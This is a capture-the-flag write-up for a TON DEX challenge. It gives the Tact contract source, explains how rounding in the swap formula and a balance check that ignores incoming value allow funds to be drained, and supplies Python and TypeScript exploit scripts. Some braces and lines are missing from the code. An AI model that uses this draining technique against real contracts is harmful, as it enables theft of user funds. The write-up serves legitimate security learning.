2024 | TON CTF



Challenge Files

import "@stdlib/deploy";

message Withdraw {
    value: Int as coins;

message Swap {
    amount: Int as coins;
    a_b: Int;

contract Dex with Deployable {

    override const storageReserve: Int = ton("0.1");
    solved: Bool;
    lock: Bool;
    tokena_amount: Int as coins;
    tokenb_amount: Int as coins;
    user_balances: map<Int, Int>;
    user_created: Bool;

    init(ctf: Int) {
        self.solved = false;
        self.lock = true;
        self.user_created = false;
        self.tokena_amount = 10;
        self.tokenb_amount = 10;

        require(!self.user_created, "User created");        
        self.user_balances.set(1, 10);
        self.user_balances.set(2, 0);
        self.user_created = true;

    receive(msg: Swap){
        let ctx: Context = context();
        require(ctx.value>=ton("0.14"),"insufficient pay for gas");
        require(self.user_created, "Not created");   
        let x: Int  = self.tokena_amount;
        let y: Int  = self.tokenb_amount;
        let user_a: Int = self.user_balances.get(1)!!;
        let user_b: Int = self.user_balances.get(2)!!;
        if(msg.a_b == 1){
            require(user_a >= msg.amount, "Insufficient balance");
            let out_amount: Int = y - (x*y)/(x + msg.amount);
            self.user_balances.set(1, user_a - msg.amount);
            self.user_balances.set(2, user_b + out_amount);
            self.tokena_amount = x + msg.amount;
            self.tokenb_amount = y - out_amount;
        }else {
            require(user_b >= msg.amount, "Insufficient balance");
            let out_amount: Int = x - (x*y)/(y + msg.amount);
            self.user_balances.set(1, user_a + out_amount);
            self.user_balances.set(2, user_b - msg.amount);
            self.tokena_amount = x - out_amount;  
            self.tokenb_amount = y + msg.amount;     
        if (self.user_balances.get(1)!! + self.user_balances.get(2)!! == 29){
            self.lock = false;

    receive(msg: Withdraw) {
        require(!self.lock, "locking");
        // Get the current context
        let ctx: Context = context();
        // Require required balance
        require(myBalance() > ton("1.0") + self.storageReserve + msg.value, "Insufficient balance");
        // Withdraw
            value: msg.value, 
            mode: SendRemainingValue,
            to: ctx.sender, 
            body: "Withdraw сompleted".asComment()

        require(!self.lock, "Locking");        
        if (myBalance()<ton("0.5")){
            self.solved = true;

    get fun is_solved(): Bool {
        return self.solved == true;


  • We first need to let the sum of the user_balances be 29 to set locked to false. After unlocking, send a Solve message when the contract balance is less than 0.5 ton to solve the challenge
  • There is a loss of precision when calculating the out_amount. So, we may get more tokens after swapping

    • Note that amount is serialized as coins, which is an alias to VarUInteger_16. We can not send a negative value

      message Swap {
          amount: Int as coins;
          a_b: Int;
  • After swapping, the contract balance will be surely above 0.5 ton. Because each swap requires sending at least 0.14 ton, and locked can't be set to false with just one or two swaps

  • We have to bypass the check and withdraw some ton from the contract. myBalance() returns the nanoToncoin balance of the smart contract as it was at the start of the compute phase of the current transaction. Thus, we can increase the value attached to the withdraw message. Any excess left from the incoming message after all gas costs are deducted from it will be add to the outgoing value because of the send mode SendRemainingValue

    • Each transaction consists of up to 5 phases: storage phase, credit phase, compute phase, action phase and bounce phase. In the credit phase, the balance of the contract with respect to a (possible) incoming message value and collected storage fee are calculated
    receive(msg: Withdraw) {
        require(!self.lock, "locking");
        // Get the current context
        let ctx: Context = context();
        // Require required balance
        require(myBalance() > ton("1.0") + self.storageReserve + msg.value, "Insufficient balance");
        // Withdraw
            value: msg.value, 
            mode: SendRemainingValue,
            to: ctx.sender, 
            body: "Withdraw сompleted".asComment()


Before and after the swap, the sum of tokena_amount, tokenb_amount, user_balances(1) and user_balances(2) remains unchanged. So after each swap, we hope that the sum of user_balances will increase, or at least the product of tokena_amount and tokenb_amount will decrease, which may result in a larger out_amount.

def fun(x, y, user_a, user_b, a, f):
    if f == 1:
        out = y - (x * y) // (x + a)
        return user_a - a, user_b + out, x + a, y - out
        out = x - (x * y) // (y + a)
        return user_a + out, user_b - a, x - out, y + a

user_a, user_b = 10, 0
x, y = 10, 10
cnt = 0

while user_a + user_b < 29:
    if user_b == 0 or user_a > 0:
        for i in range(user_a, 0, -1):
            ra, rb, rx, ry = fun(x, y, user_a, user_b, i, 1)
            if ra + rb > user_a + user_b or rx * ry < x * y:
                user_a, user_b, x, y = ra, rb, rx, ry
                print(f"amount:{i} a_b:{1} user_a:{user_a} user_b:{user_b} x:{x} y:{y}")
                cnt += 1
    if user_a == 0:
        for i in range(1, user_b + 1):
            ra, rb, rx, ry = fun(x, y, user_a, user_b, i, 0)
            if ra + rb > user_a + user_b or rx * ry < x * y:
                user_a, user_b, x, y = ra, rb, rx, ry
                print(f"amount:{i} a_b:{0} user_a:{user_a} user_b:{user_b} x:{x} y:{y}")
                cnt += 1
import { OpenedContract, Address, toNano, TonClient, WalletContractV4 } from "@ton/ton";
import { mnemonicToPrivateKey } from "ton-crypto";
import { Dex } from "./output/Dex_Dex";
import * as dotenv from "dotenv";

async function sleep(wallet_contract: OpenedContract<WalletContractV4>, seq: number) {
    while (true) {
        if (seq < (await wallet_contract.getSeqno())) {
            return wallet_contract.getSeqno();

(async () => {
    const client = new TonClient({
        endpoint: "",

    let mnemonics = (process.env.mnemonics_2 || "").toString();

    let keyPair = await mnemonicToPrivateKey(mnemonics.split(" "));
    let secretKey = keyPair.secretKey;
    let workchain = 0;
    let deployer_wallet = WalletContractV4.create({ workchain, publicKey: keyPair.publicKey });

    let deployer_wallet_contract = client.open(deployer_wallet);
    console.log("Balance", await deployer_wallet_contract.getBalance());

    let target = Address.parse(CONTRACT);

    let contract_open = await client.open(Dex.fromAddress(target));
    let seqno: number = await deployer_wallet_contract.getSeqno();
    await contract_open.send(
            value: toNano("0.1"),
    seqno = await sleep(deployer_wallet_contract, seqno);
    console.log("User created");
    let l = [[9, 1], [1, 1], [1, 0], [3, 1], [1, 1], [1, 0], [4, 1], [1, 1], [1, 0], [7, 1], [1, 0], [9, 1], [1, 1], [1, 0]];
    for (let i = 0; i < l.length; i++) {
        await contract_open.send(
                value: toNano("0.14"),
                "$$type": "Swap",
                "amount": BigInt(l[i][0]),
                "a_b": BigInt(l[i][1]),
        seqno = await sleep(deployer_wallet_contract, seqno);
        console.log("Sent", i);
    console.log("Swap done");
    await contract_open.send(
            value: toNano("2"),
            "$$type": "Withdraw",
            "value": toNano("1.9"),
    seqno = await sleep(deployer_wallet_contract, seqno);

    await contract_open.send(
            value: toNano("0.01"),
    await sleep(deployer_wallet_contract, seqno);
    console.log(await contract_open.getIsSolved());




最后更新: 2024年10月2日 20:11:22
Contributors: YanhuiJessica
